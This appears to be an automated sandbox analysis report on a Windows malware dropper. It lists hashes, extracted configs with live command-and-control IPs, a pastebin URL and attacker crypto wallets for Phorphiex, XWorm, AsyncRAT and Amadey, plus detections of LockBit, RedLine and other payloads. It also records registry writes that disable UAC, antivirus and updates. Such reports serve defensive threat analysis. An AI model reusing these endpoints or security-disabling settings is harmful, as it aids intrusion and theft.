Resubmissions
14-11-2024 23:57
241114-3zzkpavhpf 1014-11-2024 23:44
241114-3rj52avgna 1014-11-2024 23:36
241114-3ln7ssvjfs 1014-11-2024 23:24
241114-3dnajayler 1014-11-2024 23:10
241114-25qpastqgt 10Analysis
-
max time kernel
251s -
max time network
599s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
14-11-2024 23:24
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20241023-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
-
mutex
mmn7nnm8na
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
xworm
5.0
police-turkish.gl.at.ply.gg:46359
98LKJ8osZWR75pSw
-
install_file
USB.exe
Extracted
xworm
https://pastebin.com/raw/LWUHVqrD:48602480
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/LWUHVqrD
Extracted
phorphiex
http://185.215.113.66
http://185.215.113.84
-
mutex
Klipux
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Default
47.238.55.14:4449
rqwcncaesrdtlckoweu
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Signatures
-
Amadey family
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
resource yara_rule behavioral1/files/0x000500000001d9da-11168.dat family_ammyyadmin -
Ammyyadmin family
-
Asyncrat family
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0008000000014bef-122.dat family_xworm behavioral1/memory/1924-126-0x00000000011F0000-0x00000000011FE000-memory.dmp family_xworm behavioral1/files/0x000d000000014f83-144.dat family_xworm behavioral1/memory/1904-148-0x0000000001100000-0x0000000001114000-memory.dmp family_xworm -
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral1/files/0x000600000001c8ef-12672.dat zharkcore -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysklnorbcv.exe -
Phorphiex family
-
Phorphiex payload 5 IoCs
resource yara_rule behavioral1/files/0x000e000000014ba6-59.dat family_phorphiex behavioral1/files/0x0006000000015f7b-8222.dat family_phorphiex behavioral1/files/0x0008000000016d43-9243.dat family_phorphiex behavioral1/files/0x000500000001ccbf-9261.dat family_phorphiex behavioral1/files/0x000400000001cccb-9298.dat family_phorphiex -
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/files/0x000400000001e0e3-12714.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/4844-10396-0x0000000001140000-0x000000000117E000-memory.dmp family_redline -
Redline family
-
Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
resource yara_rule behavioral1/files/0x00050000000186ed-8413.dat family_lockbit -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/2688-11315-0x0000000000160000-0x00000000001F8000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 4616 created 1100 4616 3721125312.exe 20 PID 4616 created 1100 4616 3721125312.exe 20 PID 3840 created 1100 3840 winupsecvmgr.exe 20 PID 3840 created 1100 3840 winupsecvmgr.exe 20 PID 3840 created 1100 3840 winupsecvmgr.exe 20 PID 4792 created 1100 4792 Thermal.pif 20 PID 2380 created 1100 2380 Optimum.pif 20 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe -
Xworm family
-
Zharkbot family
-
DCRat payload 1 IoCs
resource yara_rule behavioral1/memory/5000-11978-0x00000000064B0000-0x00000000067B1000-memory.dmp family_dcrat_v2 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e3e353915c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6d85c101d5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 97252a0aa2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1Z45e8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2s3369.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3P43S.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ DocumentsAKKEHIECFC.exe -
Renames multiple (321) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 577 4396 iexplore.exe 578 4396 iexplore.exe 598 2068 iexplore.exe 599 2068 iexplore.exe 692 2392 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5052 powershell.exe 872 powershell.exe 2376 powershell.exe 5112 powershell.exe 2308 powershell.exe 1984 powershell.exe 4704 powershell.exe 2696 powershell.exe 1708 powershell.exe -
Contacts a large (568) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4044 attrib.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\alark\ImagePath = "C:\\Windows\\alark.exe" reg.exe -
Uses browser remote debugging 2 TTPs 3 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4396 chrome.exe 3172 chrome.exe 2564 chrome.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1Z45e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6d85c101d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2s3369.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e3e353915c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6d85c101d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2s3369.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3P43S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DocumentsAKKEHIECFC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e3e353915c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1Z45e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3P43S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DocumentsAKKEHIECFC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 97252a0aa2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 97252a0aa2.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\International\Geo\Nation AA_v3.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DM5eEerrTjwa7pLFZCagRdpZ.bat file1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ogriIqEF.url random.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url cmd.exe -
Executes dropped EXE 64 IoCs
pid Process 2360 tdrpload.exe 1924 svchost.exe 1236 Vhpcde.exe 820 sysppvrdnvs.exe 1904 XClient.exe 2344 npp.exe 3144 clr.exe 3516 instsrv.exe 2536 1138210337.exe 1884 alark.exe 2908 miter.exe 2396 368923376.exe 4164 sysnldcvmr.exe 3612 1513115570.exe 4088 1199625863.exe 2076 44286951.exe 308 2002914642.exe 1648 88aext0k.exe 4272 Taskmgr.exe 1604 773631861.exe 5104 303212763.exe 3108 558624310.exe 4616 3721125312.exe 3840 winupsecvmgr.exe 3992 23732637.exe 3880 t2.exe 1560 pornhub_downloader.exe 4956 tt.exe 4988 PORNHU~1.EXE 972 sysklnorbcv.exe 2312 s.exe 2252 soft.exe 3552 sysmablsvr.exe 4256 cvv.exe 5052 sysvplervcs.exe 4836 zxcv.exe 3192 intosvc.exe 4548 zxcv.exe 2000 SD4KMyi59u.exe 5116 AUaFgs70Om.exe 1120 5C82.tmp 3744 hashed.exe 4960 2615611998.exe 2968 iexplore.exe 2460 219214699.exe 2888 3004616838.exe 4412 iexplore.exe 4712 184854346.exe 2596 81767200.exe 2700 329988372.exe 4352 iexplore.exe 2944 2434428799.exe 5100 3308631091.exe 3316 341332466.exe 2664 random.exe 4844 frap.exe 3504 compiled.exe 3076 compiled.exe 3848 2784122165.exe 2656 853921094.exe 2372 636524000.exe 604 iexplore.exe 2592 iexplore.exe 4688 PkContent.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine e3e353915c.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 6d85c101d5.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 97252a0aa2.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 1Z45e8.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 2s3369.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 3P43S.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine DocumentsAKKEHIECFC.exe -
Loads dropped DLL 64 IoCs
pid Process 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 2344 npp.exe 2344 npp.exe 820 sysppvrdnvs.exe 820 sysppvrdnvs.exe 4164 sysnldcvmr.exe 820 sysppvrdnvs.exe 4164 sysnldcvmr.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 4324 Process not Found 820 sysppvrdnvs.exe 4164 sysnldcvmr.exe 4164 sysnldcvmr.exe 1604 773631861.exe 3740 taskeng.exe 2396 368923376.exe 2396 368923376.exe 4048 WerFault.exe 4048 WerFault.exe 4048 WerFault.exe 4048 WerFault.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 4780 cmd.exe 4780 cmd.exe 4836 zxcv.exe 2692 WerFault.exe 2692 WerFault.exe 2692 WerFault.exe 2692 WerFault.exe 4548 zxcv.exe 2692 WerFault.exe 4548 zxcv.exe 3992 23732637.exe 1596 4363463463464363463463463.exe 1596 4363463463464363463463463.exe 972 sysklnorbcv.exe 3552 sysmablsvr.exe 5052 sysvplervcs.exe 972 sysklnorbcv.exe 3552 sysmablsvr.exe 5052 sysvplervcs.exe 972 sysklnorbcv.exe 3552 sysmablsvr.exe 5052 sysvplervcs.exe 1596 4363463463464363463463463.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\6d85c101d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006312001\\6d85c101d5.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe" t2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" tt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" s.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" valid.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" N2P23.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" Y9Q63.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\e3e353915c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006311001\\e3e353915c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\97252a0aa2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006314001\\97252a0aa2.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" tdrpload.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 1138210337.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 1.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe -
